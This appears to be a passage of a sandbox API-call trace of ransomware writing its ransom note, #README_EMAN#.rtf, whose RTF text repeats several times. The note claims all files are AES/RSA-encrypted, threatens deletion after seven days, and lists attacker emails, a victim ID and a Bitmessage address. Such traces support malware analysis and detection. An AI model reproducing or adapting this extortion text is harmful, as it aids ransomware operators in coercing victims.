\\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nêpñ\x03]Ä\x0bõ5B\x18,", lpUsedDefaultChar=0x0) returned 8717 [0269.085] WriteFile (in: hFile=0x294, lpBuffer=0x24607d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24607d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.085] CloseHandle (hObject=0x294) returned 1 [0269.085] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\#readme_eman#.rtf")) returned 0xffffffff [0269.085] GetLastError () returned 0x2 [0269.085] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0269.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s 